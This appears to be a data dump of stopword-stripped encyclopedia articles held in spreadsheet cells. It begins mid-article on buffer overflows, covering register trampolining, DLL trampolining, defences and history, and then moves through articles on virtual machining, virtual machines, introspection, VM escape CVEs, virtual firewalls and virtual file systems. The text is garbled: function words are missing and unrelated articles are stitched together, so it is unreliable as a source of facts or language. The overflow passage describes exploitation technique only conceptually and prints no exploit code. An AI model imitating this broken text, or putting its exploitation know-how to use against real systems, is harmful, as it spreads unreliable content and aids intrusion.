extra room nop-sled without guess stack offsets. strategy overwrite return pointer something cause program jump known pointer stored within register points controlled buffer thus shellcode. example, register contains pointer start buffer jump call taking register operand used gain control flow execution. practice program intentionally contain instructions jump particular register. traditional solution find unintentional instance suitable opcode fixed location somewhere within program memory. figure left example unintentional instance i386 instruction. opcode instruction this two-byte sequence found one-byte offset start instruction call dbgprint address 0x7c941eed. attacker overwrites program return address address program first jump 0x7c941eed, interpret opcode instruction, jump stack execute attacker's code.when technique possible severity vulnerability increases considerably. this exploitation work reliably enough automate attack virtual guarantee success run. reason, technique commonly used internet worms exploit stack buffer overflow vulnerabilities.this method also allows shellcode placed overwritten return address windows platform. since executables mostly based address 0x00400000 little endian architecture, last byte return address must null, terminates buffer copy nothing written beyond that. this limits size shellcode size buffer, overly restrictive. dlls located high memory (above 0x01000000) addresses containing null bytes, method remove null bytes disallowed characters) overwritten return address. used way, method often referred "dll trampolining". protective countermeasures various techniques used detect prevent buffer overflows, various tradeoffs. reliable avoid prevent buffer overflows automatic protection language level. this sort protection, however, cannot applied legacy code, often technical, business, cultural constraints call vulnerable language. following sections describe choices implementations available. choice programming language assembly c/c++ popular programming languages vulnerable buffer overflow, part allow direct access memory strongly typed. provides built-in protection accessing overwriting data part memory; specifically, check data written buffer within boundaries buffer. standard libraries provide many ways safely buffering data, c++'s standard template library (stl) provides containers optionally perform bounds checking programmer explicitly calls checks accessing data. example, vector's member function at() performs bounds check throws out_of_range exception bounds check fails. however, behaves like bounds check explicitly called. techniques avoid buffer overflows also exist languages strongly typed allow direct memory access, cobol, java, python, others, prevent buffer overflow occurring cases. many programming languages c/c++ provide runtime checking cases even compile-time checking might send warning raise exception would overwrite data continue execute instructions erroneous results obtained might might cause program crash. examples languages include ada, eiffel, lisp, modula-2, smalltalk, ocaml c-derivatives cyclone, rust java .net framework bytecode environments also require bounds checking arrays. nearly every interpreted language protect buffer overflows, signaling well-defined error condition. often language provides enough type information bounds checking option provided enable disable static code analysis remove many dynamic bound type checks, poor implementations awkward cases significantly decrease performance. software engineers must carefully consider tradeoffs safety versus performance costs deciding language compiler setting use. safe libraries problem buffer overflows common languages expose level representational details buffers containers data types. buffer overflows must thus avoided maintaining high degree correctness code performs buffer management. also long recommended avoid standard library functions bounds checked, gets, scanf strcpy. morris worm exploited gets call fingerd.well-written tested abstract data type libraries centralize automatically perform buffer management, including bounds checking, reduce occurrence impact buffer overflows. main building-block data types languages buffer overflows commonly occur strings arrays; thus, libraries preventing buffer overflows data types provide vast majority necessary coverage. still, failure safe libraries correctly result buffer overflows vulnerabilities; naturally, library potential vulnerability. "safe" library implementations include "the better string library", vstr erwin. openbsd operating system's library provides strlcpy strlcat functions, limited full safe library implementations. september 2007, technical report 24731, prepared standards committee, published; specifies functions based standard library's string functions, additional buffer-size parameters. however, efficacy functions purpose reducing buffer overflows disputable; requires programmer intervention function call basis equivalent intervention could make analogous older standard library functions buffer overflow safe. buffer overflow protection buffer overflow protection used detect common buffer overflows checking stack altered function returns. altered, program exits segmentation fault. three systems libsafe, stackguard propolice patches. microsoft's implementation data execution prevention (dep) mode explicitly protects pointer structured exception handler (seh) overwritten.stronger stack protection possible splitting stack two: data function returns. this split present forth language, though security-based design decision. regardless, complete solution buffer overflows, sensitive data return address still overwritten. pointer protection buffer overflows work manipulating pointers, including stored addresses. pointguard proposed compiler-extension prevent attackers able reliably manipulate pointers addresses. approach works compiler code automatically xor-encode pointers used. theoretically, attacker know value used encode/decode pointer, cannot predict point overwrites value. pointguard never released, microsoft implemented similar approach beginning windows windows server 2003 sp1. rather implement pointer protection automatic feature, microsoft added routine called. this allows better performance (because used time), places burden programmer know necessary. because linear, attacker able manipulate encoded pointer overwriting lower bytes address. this allow attack succeed attacker able attempt exploit multiple times able complete attack causing pointer point several locations (such location within sled). microsoft added random rotation encoding scheme address weakness partial overwrites. executable space protection executable space protection approach buffer overflow protection prevents execution code stack heap. attacker buffer overflows insert arbitrary code memory program, executable space protection, attempt execute code cause exception. some cpus support feature called ("no execute") ("execute disabled") bit, conjunction software, used mark pages data (such containing stack heap) readable writable executable. some unix operating systems (e.g. openbsd, macos) ship executable space protection (e.g. w^x). some optional packages include: exec shield openwallnewer variants microsoft windows also support executable space protection, called data execution prevention. proprietary add-ons include: buffershield stackdefenderexecutable space protection generally protect return-to-libc attacks, attack rely execution attackers code. however, 64-bit systems using aslr, described below, executable space protection makes difficult execute attacks. address space layout randomization address space layout randomization (aslr) computer security feature involves arranging positions data areas, usually including base executable position libraries, heap, stack, randomly process' address space. randomization virtual memory addresses functions variables found make exploitation buffer overflow difficult, impossible. also forces attacker tailor exploitation attempt individual system, foils attempts internet worms. similar less effective method rebase processes libraries virtual address space. deep packet inspection deep packet inspection (dpi) detect, network perimeter, basic remote attempts exploit buffer overflows attack signatures heuristics. these able block packets signature known attack, long series no-operation instructions (known nop-sled) detected, used location exploit's payload slightly variable. packet scanning effective method since prevent known attacks many ways nop-sled encoded. shellcode used attackers made alphanumeric, metamorphic, self-modifying evade detection heuristic packet scanners intrusion detection systems. testing checking buffer overflows patching bugs cause naturally helps prevent buffer overflows. common automated technique discovering fuzzing. edge case testing also uncover buffer overflows, static analysis. once potential buffer overflow detected, must patched; makes testing approach useful software development, less useful legacy software longer maintained supported. history buffer overflows understood partially publicly documented early 1972, computer security technology planning study laid technique: "the code performing function check source destination addresses properly, permitting portions monitor overlaid user. this used inject code monitor permit user seize control machine." today, monitor would referred kernel. earliest documented hostile exploitation buffer overflow 1988. several exploits used morris worm propagate internet. program exploited service unix called finger. later, 1995, thomas lopatic independently rediscovered buffer overflow published findings bugtraq security mailing list. year later, 1996, elias levy (also known aleph one) published phrack magazine paper "smashing stack profit", step-by-step introduction exploiting stack-based buffer overflow vulnerabilities. since then, least major internet worms exploited buffer overflows compromise large number systems. 2001, code worm exploited buffer overflow microsoft's internet information services (iis) 2003 slammer worm compromised machines running microsoft server 2000.in 2003, buffer overflows present licensed xbox games exploited allow unlicensed software, including homebrew games, console without need hardware modifications, known modchips. independence exploit also used buffer overflow achieve playstation twilight hack accomplished wii, using buffer overflow legend zelda: twilight princess. also references external links "discovering exploiting remote buffer overflow vulnerability server" raykoid666 "smashing stack profit" aleph gerg, isaac (2005-05-02). overview example buffer-overflow exploit" (pdf). ianewsletter. information assurance technology analysis center. (4): 16–21. archived original (pdf) 2006-09-27. retrieved 2019-03-17. cert secure coding standards cert secure coding initiative secure coding sans: inside buffer overflow attack "advances adjacent memory overflows" nomenumbra comparison buffer overflow prevention implementations weaknesses more security whitepapers buffer overflows chapter writing exploits sockets, shellcode, porting coding: reverse engineering exploits tool coding security professionals james foster (isbn 1-59749-005-9). detailed explanation metasploit develop buffer overflow exploit scratch. computer security technology planning study, james anderson, esd-tr-73-51, esd/afsc, hanscom afb, bedford, 01731 (october 1972) [ntis ad-758 206] "buffer overflows: anatomy exploit" nevermore secure programming glibc archived 2008-11-21 wayback machine (2008), marcel holtmann "criação exploits buffer overflor parte pouco teoria (2018), helvio junior (m4v3r1ck)</t>
  </si>
  <si>
    <t>Virtual machining</t>
  </si>
  <si>
    <t>virtual machining practice using computers simulate model machine tools part manufacturing. such activity replicates behavior errors real environment virtual reality systems. this provide useful ways manufacture products without physical testing shop floor. result, time cost part production decreased. applications virtual machining provides various benefits: simulated machining process virtual environments reveals errors without wasting materials, damaging machine tools, putting workers risk. computer simulation helps improve accuracy produced part. virtual inspection systems surface finish, surface metrology, waviness applied simulated parts virtual environments increase accuracy. systems augment process planning machining operations regards desired tolerances part designing. virtual machining system used process planning machining operations considering suitable steps machining operations regard time cost part manufacturing. optimization techniques applied simulated machining process increase efficiency parts production. finite element method (fem) applied simulated machining process virtual environments analyze stress strain machine tool, workpiece cutting tool. accuracy mathematical error modeling prediction machined surfaces analyzed using virtual machining systems. machining operations flexible materials analyzed virtual environments increase accuracy part manufacturing. vibrations machine tools well possibility chatter along cutting tool paths machining operations analyzed using simulated machining operations virtual environments. time cost accurate production decreased applying rules production process management simulated manufacturing process virtual environment. feed rate scheduling systems based virtual machining also presented increase accuracy well efficiency part manufacturing. material removal rate machining operations complex surfaces simulated virtual environments analysis optimization. efficiency part manufacturing improved analyzing optimizing production methods. errors actual machined parts simulated virtual environments analysis compensation. simulated machining centers virtual environments connected network internet remote analysis modification. elements structures machine tools spindle, rotation axis, moving axes, ball screw, numerical control unit, electric motors (step motor servomotor), simulated virtual environments analyzed modified. result, optimized versions machine tool elements boost levels technology part manufacturing. geometry cutting tools analyzed modified result simulated cutting forces virtual environments. thus, machining time well surface roughness minimized tool life maximized decreasing cutting forces modified geometries cutting tools. also, modified versions cutting tool geometries regards minimizing cutting forces decrease cost cutting tools presenting wider range acceptable materials cutting tools high-speed steel, carbon tool steels, cemented carbide, ceramic, cermet generated heat engagement areas cutting tool workpiece simulated, analyzed, decreased. tool life maximized result decreasing generated heat engagement areas cutting tool workpiece. machining strategies analyzed modified virtual environments terms collision detection processes. vision machining operations errors actual machined parts tool deflection error virtual environments help designers well machining strategists analyze modify process part production. virtual machining augment experience training novice machine tool operators virtual machining training system. increase added value processes part production, energy consumption machine tools simulated analyzed virtual environments presenting efficient energy machine tool. machining strategies freeform surfaces analyzed optimized virtual environments increase accuracy part manufacturing. future research works some suggestions future studies virtual machining systems presented machining operations alloy simulated virtual environments study. result, deformation, surface properties residue stress alloy analyzed modified. material cutting tool simulated analyzed virtual environments. thus, tool deflection error cutting tools along machining paths studied without need actual machining operations. deformation deflections large workpieces simulated analyzed virtual environments. machining operations expensive materials gold well superalloys simulated virtual environments predict real machining conditions without need shop floor testing. references external links virtual machining, automation world amgm institute, virtual machining machpro: virtual machining system virtual machine shop international conference virtual machining process technology (vmpt 2016) eureka virtual machining simnc products overview, virtual machining</t>
  </si>
  <si>
    <t>Virtual machine</t>
  </si>
  <si>
    <t>computing, virtual machine (vm) virtualization/emulation computer system. virtual machines based computer architectures provide functionality physical computer. their implementations involve specialized hardware, software, combination. virtual machines differ organized function, shown here: system virtual machines (also termed full virtualization vms) provide substitute real machine. they provide functionality needed execute entire operating systems. hypervisor uses native execution share manage hardware, allowing multiple environments isolated another, exist physical machine. modern hypervisors hardware-assisted virtualization, virtualization-specific hardware, primarily host cpus. process virtual machines designed execute computer programs platform-independent environment.some virtual machine emulators, qemu video game console emulators, designed also emulate "virtually imitate") different system architectures thus allowing execution software applications operating systems written another architecture. operating-system-level virtualization allows resources computer partitioned kernel. terms universally interchangeable. definitions system virtual machines "virtual machine" originally defined popek goldberg efficient, isolated duplicate real computer machine." current includes virtual machines direct correspondence real hardware. physical, "real-world" hardware running generally referred 'host', virtual machine emulated machine generally referred 'guest'. host emulate several guests, emulate different operating systems hardware platforms. desire multiple operating systems initial motive virtual machines, allow time-sharing among several single-tasking operating systems. respects, system virtual machine considered generalization concept virtual memory historically preceded ibm's cp/cms, first systems allow full virtualization, implemented time sharing providing user single-user operating system, conversational monitor system (cms). unlike virtual memory, system virtual machine entitled user write privileged instructions code. this approach certain advantages, adding input/output devices allowed standard system.as technology evolves virtual memory purposes virtualization, systems memory overcommitment applied manage memory sharing among multiple virtual machines computer operating system. possible share memory pages identical contents among multiple virtual machines physical machine, result mapping physical page technique termed kernel same-page merging (ksm). this especially useful read-only pages, holding code segments, case multiple virtual machines running similar software, software libraries, servers, middleware components, etc. guest operating systems need compliant host hardware, thus making possible different operating systems computer (e.g., windows, linux, prior versions operating system) support future software.the virtual machines support separate guest operating systems popular regard embedded systems. typical would real-time operating system simultaneously preferred complex operating system, linux windows. another would novel unproven software still developmental stage, runs inside sandbox. virtual machines advantages operating system development include improved debugging access faster reboots.multiple running guest operating system frequently engaged server consolidation. process virtual machines process sometimes called application virtual machine, managed runtime environment (mre), runs normal application inside host supports single process. created process started destroyed exits. purpose provide platform-independent programming environment abstracts away details underlying hardware operating system allows program execute platform. process provides high-level abstraction high-level programming language (compared low-level abstraction system vm). process implemented using interpreter; performance comparable compiled programming languages achieved just-in-time compilation.this type become popular java programming language, implemented using java virtual machine. other examples include parrot virtual machine .net framework, runs called common language runtime. serve abstraction layer computer language. special case process systems abstract communication mechanisms (potentially heterogeneous) computer cluster. such consist single process, process physical machine cluster. they designed ease task programming concurrent applications letting programmer focus algorithms rather communication mechanisms provided interconnect they hide fact communication takes place, attempt present cluster single machine.unlike process vms, systems provide specific programming language, embedded existing language; typically system provides bindings several languages (e.g., fortran). examples parallel virtual machine (pvm) message passing interface (mpi). they strictly virtual machines applications running still access services therefore confined system model. history both system virtual machines process virtual machines date 1960s continue areas active development. system virtual machines grew time-sharing, notably implemented compatible time-sharing system (ctss). time-sharing allowed multiple users computer concurrently: program appeared full access machine, program executed time, system switching programs time slices, saving restoring state time. this evolved virtual machines, notably ibm's research systems: m44/44x, used partial virtualization, cp-40 simmon, used full virtualization, early examples hypervisors. first widely available virtual machine architecture cp-67/cms (see history cp/cms details). important distinction using multiple virtual machines host system time-sharing, m44/44x cp-40, using virtual machine host system prototyping, simmon. emulators, hardware emulation earlier systems compatibility, date back system/360 1963, software emulation (then-called "simulation") predates process virtual machines arose originally abstract platforms intermediate language used intermediate representation program compiler; early examples date around 1966. early 1966 example o-code machine, virtual machine executes o-code (object code) emitted front bcpl compiler. this abstraction allowed compiler easily ported architecture implementing back took existing o-code compiled machine code underlying physical machine. euler language used similar design, intermediate language named (portable). this popularized around 1970 pascal, notably pascal-p system (1973) pascal-s compiler (1975), termed p-code resulting machine p-code machine. this influential, virtual machines sense often generally called p-code machines. addition intermediate language, pascal p-code also executed directly interpreter implementing virtual machine, notably ucsd pascal (1978); influenced later interpreters, notably java virtual machine (jvm). another early example snobol4 (1967), written snobol implementation language (sil), assembly language virtual machine, targeted physical machines transpiling native assembler macro assembler. macros since fallen favor, however, approach less influential. process virtual machines popular approach implementing early microcomputer software, including tiny basic adventure games, one-off implementations pyramid 2000 general-purpose engine like infocom's z-machine, graham nelson argues "possibly portable virtual machine ever created".significant advances occurred implementation smalltalk-80, particularly deutsch/schiffmann implementation pushed just-in-time (jit) compilation forward implementation approach uses process virtual machine. later notable smalltalk visualworks, squeak virtual machine, strongtalk. related language produced virtual machine innovation self programming language, pioneered adaptive optimization generational garbage collection. these techniques proved commercially successful 1999 hotspot java virtual machine. other innovations include register-based virtual machine, better match underlying hardware, rather stack-based virtual machine, closer match programming language; 1995, pioneered virtual machine limbo language. openj9 alternative hotspot openjdk open source eclipse project claiming better startup less resource consumption compared hotspot. full virtualization full virtualization, virtual machine simulates enough hardware allow unmodified "guest" (one designed instruction set) isolation. this approach pioneered 1966 cp-40 cp-67, predecessors family. examples outside mainframe field include parallels workstation, parallels desktop mac, virtualbox, virtual iron, oracle virtual virtual server, hyper-v, vmware workstation, vmware server (discontinued, formerly called server), vmware esxi, qemu, adeos, mac-on-linux, win4bsd, win4lin pro, egenera vblade technology. hardware-assisted virtualization hardware-assisted virtualization, hardware provides architectural support facilitates building virtual machine monitor allows guest oses isolation. hardware-assisted virtualization first introduced system/370 1972, vm/370, first virtual machine operating system offered official product.in 2005 2006, intel provided additional hardware support virtualization. microsystems (now oracle corporation) added similar features ultrasparc t-series processors 2005. examples virtualization platforms adapted hardware include kvm, vmware workstation, vmware fusion, hyper-v, windows virtual xen, parallels desktop mac, oracle server sparc, virtualbox parallels workstation. 2006, first-generation 64-bit hardware support found rarely offer performance advantages software virtualization. operating-system-level virtualization operating-system-level virtualization, physical server virtualized operating system level, enabling multiple isolated secure virtualized servers single physical server. "guest" operating system environments share running instance operating system host system. thus, operating system kernel also used implement "guest" environments, applications running given "guest" environment view stand-alone system. pioneer implementation freebsd jails; examples include docker, solaris containers, openvz, linux-vserver, lxc, workload partitions, parallels virtuozzo containers, icore virtual accounts. also references further reading james smith, ravi nair, virtual machines: versatile platforms systems processes, morgan kaufmann, 2005, isbn 1-55860-910-5, pages (covers process system virtual machines) craig, iain virtual machines. springer, 2006, isbn 1-85233-969-1, pages (covers process virtual machines) external links mendel rosenblum (2004-08-31). "the reincarnation virtual machines". queue. vol. sandia national laboratories runs million linux kernels virtual machines design inferno virtual machine phil winterbottom pike</t>
  </si>
  <si>
    <t>Virtual machine introspection</t>
  </si>
  <si>
    <t>computing, virtual machine introspection (vmi) technique "for monitoring runtime state system-level virtual machine (vm)", helpful debugging forensic analysis.the term introspection application virtual machines introduced garfinkel rosenblum. they invented approach "protecting security application attack malicious software" called vmi. common term different virtual machine forensics analysis methods. vmi-based approaches widely used security applications, software debugging, systems management.vmi tools located inside outside virtual machine tracking events (interrupts, memory writes, sending requests virtual machine. virtual machine monitor usually provides low-level information like bytes memory. converting low-level view something meaningful user known semantic problem. solving problem requires analysis understanding systems monitored. within virtual machine programs running inside provide information processes. this information sent network interface virtual devices like serial port. examples vivo introspection programs windbg servers interact remote debugger. drawback approach requires functioning within hangs loaded yet, introspection agent work. outside virtual machine tools implemented within virtual machine monitor separate programs capture information (e.g., contents memory) virtual machine monitor. then data interpreted understand processes system. popular tools interpretation volatility framework. this framework contains profiles many popular operating systems extract different information like process tree list kernel objects. references</t>
  </si>
  <si>
    <t>Virtual machine escape</t>
  </si>
  <si>
    <t>computer security, virtual machine escape process program breaking virtual machine running interacting host operating system. virtual machine "completely isolated guest operating system installation within normal host operating system". 2008, vulnerability (cve-2008-0923) vmware discovered core security technologies made escape possible vmware workstation 6.0.2 5.5.4. fully working exploit labeled cloudburst developed immunity inc. immunity canvas (commercial penetration testing tool). cloudburst presented black 2009. previous known vulnerabilities cve-2007-4993 pygrub: command injection grub.conf file. cve-2007-1744 directory traversal vulnerability shared folders feature vmware cve-2008-0923 directory traversal vulnerability shared folders feature vmware cve-2008-1943 para virtualized frame buffer backend buffer overflow. cve-2009-1244 cloudburst: display function vmware cve-2011-1751 qemu-kvm: piix4 emulation check device hotpluggable unplugging cve-2012-0217 x86-64 kernel system-call functionality 4.1.2 earlier cve-2014-0983 oracle virtualbox acceleration multiple memory corruption cve-2015-3456 venom: buffer-overflow qemu's virtual floppy disk controller cve-2015-7504 qemu-kvm: heap overflow pcnet_receive function. cve-2015-7835 hypervisor: uncontrolled creation large page mappings guests cve-2016-6258 hypervisor: pagetable code fast-paths making updates pre-existing pagetable entries, skip expensive re-validation safe cases (e.g. clearing access/dirty bits). bits considered safe broad, actually safe. cve-2016-7092 hypervisor: disallow recursive pagetable 32-bit guests cve-2017-5715, 2017-5753, 2017-5754: spectre meltdown hardware vulnerabilities, cache side-channel attack level (rogue data cache load (rdcl)), allow rogue process read memory computer, even outside memory assigned virtual machine cve-2017-0075 hyper-v remote code execution vulnerability cve-2017-0109 hyper-v remote code execution vulnerability cve-2017-4903 vmware esxi, workstation, fusion: svga driver contains buffer overflow allow guests execute code hosts cve-2017-4934 vmware workstation, fusion: heap buffer-overflow vulnerability vmnat device allow guest execute code host cve-2017-4936 vmware workstation, horizon view multiple out-of-bounds read issues cortado thinprint allow guest execute code perform denial service windows cve-2018-2698 oracle virtualbox: shared memory interface allows read writes host cve-2018-6981 vmware esxi, workstation, fusion: uninitialized stack memory usage vmxnet3 virtual network adapter. cve-2018-12126, cve-2018-12130, cve-2018-12127, cve-2019-11091: "microarchitectural data sampling" (mds) attacks: similar spectre meltdown attacks, cache side-channel attack level allows read data across even data host system. types: microarchitectural store buffer data sampling (msbds), microarchitectural fill buffer data sampling (mfbds) zombieload, microarchitectural load port data sampling (mlpds), microarchitectural data sampling uncacheable memory (mdsum) cve-2019-0719, cve-2019-0721, cve-2019-1389, cve-2019-1397, cve-2019-1398 windows hyper-v remote code execution vulnerability cve-2019-18420, cve-2019-18421, cve-2019-18422, cve-2019-18423, cve-2019-18424, cve-2019-18425: hypervisor citrix hypervisor: allows guest virtual machines compromise host system (denial service rights escalation) cve-2019-5183 (critical), cve-2019-5124, cve-2019-5146, cve-2019-5147: windows vmware workstation using radeon graphics cards using adrenalin driver: attacker guest system pixel shader cause memory error host system, injecting malicious code host system execute cve-2018-12130, cve-2019-11135, cve-2020-0548: zombieload, zombieload vector register sampling (vrs), microarchitectural data sampling (mds), transactional asynchronous abort (taa), cacheout, eviction sampling (l1des): cache side attacks level allow virtual machines read memory outside sandbox cve-2020-3962, cve-2020-3963, cve-2020-3964, cve-2020-3965, cve-2020-3966, cve-2020-3967, cve-2020-3968, cve-2020-3969, cve-2020-3970, cve-2020-3971: vmware esxi, workstation player, fusion pro, cloud foundation: vulnerabilities svga, graphics shader, driver, xhci/ehci, pvnvram, vmxnet3 cause virtual machine escape also hyperjacking references external links cve-2008-0923 cloudburst (hacking breaking vmware) blackhat 2009 (video) https://technet.microsoft.com/library/security/ms17-008</t>
  </si>
  <si>
    <t>Bup</t>
  </si>
  <si>
    <t>backup system written python. uses several formats capable handling large files like operating system images. block-based deduplication optional par2-based error correction. history development began 2010 accepted debian year. design uses packfile format writing packfiles directly, avoiding garbage collection. availability available source notably part following distributions debian ubuntu arch linux pkgsrc (netbsd etc.) also list backup software comparison backup software references external links website github</t>
  </si>
  <si>
    <t>Virtual firewall</t>
  </si>
  <si>
    <t>virtual firewall (vf) network firewall service appliance running entirely within virtualized environment provides usual packet filtering monitoring provided physical network firewall. realized traditional software firewall guest virtual machine already running, purpose-built virtual security appliance designed virtual network security mind, virtual switch additional security capabilities, managed kernel process running within host hypervisor. background long computer network runs entirely physical hardware cabling, physical network. protected physical firewalls fire walls alike; first important protection physical computer network always remains physical, locked, flame-resistant door. since inception internet case, structural fire walls network firewalls long time necessary sufficient. since 1998 explosive increase virtual machines (vm) addition sometimes instead physical machines offer many kinds computer communications services local area networks broader internet. advantages virtual machines well explored elsewhere.virtual machines operate isolation (for example guest operating system personal computer) unified virtualized environment overseen supervisory virtual machine monitor "hypervisor" process. case many virtual machines operate virtualized environment might connected together virtual network consisting virtualized network switches machines virtualized network interfaces within machines. resulting virtual network could implement traditional network protocols (for example tcp) virtual network provisioning vlan vpn, though latter useful reasons required. there continued perception virtual machines inherently secure seen "sandboxed" within host operating system. often believed host, like manner, secured exploitation virtual machine host threat virtual machine physical asset protected traditional physical network security. even explicitly assumed, early testing virtual infrastructures often proceeds isolated environments security rule immediate concern, security come fore solution moving production onto computer cloud, suddenly virtual machines different trust levels wind virtual network running across number physical hosts. because true networks, virtual networks suffering kinds vulnerabilities long associated physical network, being: users machines within virtual network access machines virtual network. compromising misappropriating virtual machine virtual network sufficient provide platform additional attacks machines network segment. virtual network internetworked physical network broader internet machines virtual network might access external resources (and external exploits) could leave open exploitation. network traffic passes directly machines without passing security devices unmonitored.the problems created near invisibility between-virtual machine (vm-to-vm) traffic virtual network exactly like found physical networks, complicated fact packets moving entirely inside hardware single physical host: because virtual network traffic never leave physical host hardware, security administrators cannot observe vm-to-vm traffic, cannot intercept cannot know traffic for. logging vm-to-vm network activity within single host verification virtual machine access regulatory compliance purposes becomes difficult. inappropriate uses virtual network resources bandwidth consumption vm-to-vm difficult discover rectify. unusual inappropriate services running within virtual network could undetected.there security issues known virtualized environments wreak havoc physical security measures practices, touted actual advantages virtual machine technology physical machines: deliberately unexpectedly) migrated trusted untrusted virtualized environments migration enabled. and/or virtual storage volumes easily cloned clone made part virtualized environment, including dmz. many companies purchasing departments security lead agency, applying security measures time physical machine taken initialized. since virtual machines created minutes authorized user running without paper trail, cases bypass established "first boot" security practices. physical reality leaving trace creation larger virtualized installations) continued existence. they easily destroyed well, leaving nearly digital signature absolutely physical evidence whatsoever.in addition network traffic visibility issues uncoordinated sprawl, rogue using virtual network, switches interfaces (all process host physical hardware) potentially break network could physical machine physical network usual ways though consuming host cycles additionally bring entire virtualized environment simply overpowering host physical resources rest virtualized environment depend upon. this likely become problem, perceived within industry well understood problem potentially open traditional measures responses. virtual firewalls method secure, monitor vm-to-vm traffic involved routing virtualized network traffic virtual network onto physical network vlans, hence physical firewall already present provide security compliance services physical network. vlan traffic could monitored filtered physical firewall passed back virtual network deemed legitimate purpose) target virtual machine. surprisingly, managers, security experts network security vendors began wonder might efficient keep traffic entirely within virtualized environment secure there.a virtual firewall firewall service appliance running entirely within virtualised environment even another virtual machine, readily within hypervisor providing usual packet filtering monitoring physical firewall provides. installed traditional software firewall guest already running within virtualized environment; purpose-built virtual security appliance designed virtual network security mind; virtual switch additional security capabilities; managed kernel process running within host hypervisor sits atop activity. current direction virtual firewall technology combination security-capable virtual switches, virtual security appliances. some virtual firewalls integrate additional networking functions site-to-site remote access vpn, qos, filtering more. operation virtual firewalls operate different modes provide security services, depending point deployment. typically either bridge-mode hypervisor-mode(hypervisor-based, hypervisor-resident). both come shrink wrapped virtual security appliance install virtual machine management purposes. virtual firewall operating bridge-mode acts like physical-world firewall analog; sits strategic part network infrastructure usually inter-network virtual switch bridge intercepts network traffic destined network segments needing travel bridge. examining source origin, destination, type packet even payload decide packet allowed passage, dropped, rejected, forwarded mirrored device. initial entrants virtual firewall field largely bridge-mode, many offers retain feature. contrast, virtual firewall operating hypervisor-mode actually part virtual network all, physical-world device analog. hypervisor-mode virtual firewall resides virtual machine monitor hypervisor well positioned capture activity including packet injections. entire monitored virtual hardware, software, services, memory storage examined, changes these. further, since hypervisor-based virtual firewall part network proper virtual machine functionality cannot monitored turn altered users software limited running access virtualized network. bridge-mode virtual firewalls installed virtual machine virtualized infrastructure. since virtual machine itself, relationship become complicated time disappearing appearing random ways, migrating different physical hosts, uncoordinated changes allowed virtualized infrastructure. hypervisor-mode virtual firewalls require modification physical host hypervisor kernel order install process hooks modules allowing virtual firewall system access information direct access virtual network switches virtualized network interfaces moving packet traffic network gateway. hypervisor-resident virtual firewall hooks perform customary firewall functions like packet inspection, dropping, forwarding without actually touching virtual network point. hypervisor-mode virtual firewalls much faster technology running bridge-mode packet inspection virtual machine, rather within kernel native hardware speeds. also virtual security appliance network function virtualization references further reading "zeus appears cloud, detected, dismissed" babcock, charles. informationweek 2009 "40,000 firewalls! help please!?" texiwill. virtualization practice. sept 2009 "opinion need virtual security? ben-efraim, amir. government security news. 2009 "keep your virtual networks safe" zillion magazine. july 2009 "the virtual blind spot" schultz, beth. networkworld. july 2010 "cloud security real world: examples" brandel, mary. cso: security risk. june 2010 "securing mixed environments everybody virtualized" ogren, eric. computerworld. june 2010 "new security tools protect virtual machines" strom, david. network world march 2011</t>
  </si>
  <si>
    <t>Virtual file system</t>
  </si>
  <si>
    <t>virtual file system (vfs) virtual filesystem switch abstract layer concrete file system. purpose allow client applications access different types concrete file systems uniform way. can, example, used access local network storage devices transparently without client application noticing difference. used bridge differences windows, classic os/macos unix filesystems, applications access files local file systems types without know type file system accessing. specifies interface "contract") kernel concrete file system. therefore, easy support file system types kernel simply fulfilling contract. terms contract might change incompatibly release release, would require concrete file system support recompiled, possibly modified recompilation, allow work release operating system; supplier operating system might make backward-compatible changes contract, concrete file system support built given release operating system would work future versions operating system. implementations first virtual file system mechanisms unix-like systems introduced microsystems sunos 1985. allowed unix system calls access local file systems remote file systems transparently. reason, unix vendors licensed code often copied design sun's vfs. other file systems could plugged also: implementation ms-dos file system developed plugged sunos vfs, although shipped product sunos 4.1. sunos implementation basis mechanism system release john heidemann developed stacking sunos experimental ficus file system. this design provided code reuse among file system types differing similar semantics (e.g., encrypting file system could reuse naming storage-management code non-encrypting file system). heidemann adapted work 4.4bsd part thesis research; descendants code underpin file system implementations modern derivatives including macos. other unix virtual file systems include file system switch system release generic file system ultrix, linux. os/2 microsoft windows, virtual file system mechanism called installable file system. filesystem userspace (fuse) mechanism allows userland code plug virtual file system mechanism linux, netbsd, freebsd, opensolaris, macos. microsoft windows, virtual filesystems also implemented userland shell namespace extensions; however, support lowest-level file system access application programming interfaces windows, applications able access file systems implemented namespace extensions. gvfs/gio provide similar mechanisms gnome desktop environments (respectively), similar limitations, although made fuse techniques therefore integrate smoothly system. single-file virtual file systems sometimes virtual file system refers file group files (not necessarily inside concrete file system) acts manageable container provide functionality concrete file system usage software. examples containers cbfs storage single-file virtual file system emulator like pctask so-called winuae, oracle's virtualbox, microsoft's virtual vmware. primary benefit type file system centralized easy remove. single-file virtual file system include basic features expected file system (virtual otherwise), access internal structure file systems often limited programs specifically written make single-file virtual file system (instead implementation driver allowing universal access). another major drawback performance relatively compared virtual file systems. performance mostly cost shuffling virtual files data written deleted virtual file system. implementation single-file virtual filesystems direct examples single-file virtual file systems include emulators, pctask winuae, encapsulate filesystem data also emulated disk layout. this makes easy treat installation like piece software—transferring removable media network. pctask amiga emulator pctask emulated intel 8088 based machine clocked 4.77mhz (and later 80486sx clocked mhz). users pctask could create file large size amiga filesystem, file would virtually accessed emulator real hard disk. file could formatted fat16 filesystem store normal ms-dos windows files. winuae windows, winuae, allows large single files windows treated amiga file systems. winuae file called hardfile.uae could also treat directory host filesystem (windows, linux, macos, amigaos) amiga filesystem. also (protocol) distributed file system protocol maps directly layer plan making file system access network-transparent synthetic file system hierarchical interface non-file objects appear regular files tree disk-based file system notes emulation amiga comparison pctask, amiga emulators. also this article explaining works pctask. help about winuae (see hardfile section). help about winuae (see directory section) references linux kernel's virtual file system rodriguez, koehler; hyde (june 1986). "the generic file system". proceedings usenix summer technical conference. atlanta, georgia: usenix association. 260–269. karels, mckusick (september 1986). "towards compatible file system interface". proceedings european unix users group meeting. manchester, england: euug. 481–496. heidemann, john (1995). stackable design file systems (technical report). ucla. csd-950032. linux vfs, chapter linux file systems moshe (mcgraw-hill, 2001). isbn 0-07-212955-7 chapter understanding linux kernel daniel bovet, marco cesati (o'reilly media, 2005). isbn 0-596-00565-2 linux model: naming structure external links anatomy linux virtual file system switch</t>
  </si>
  <si>
    <t>Burst cutting area</t>
  </si>
  <si>
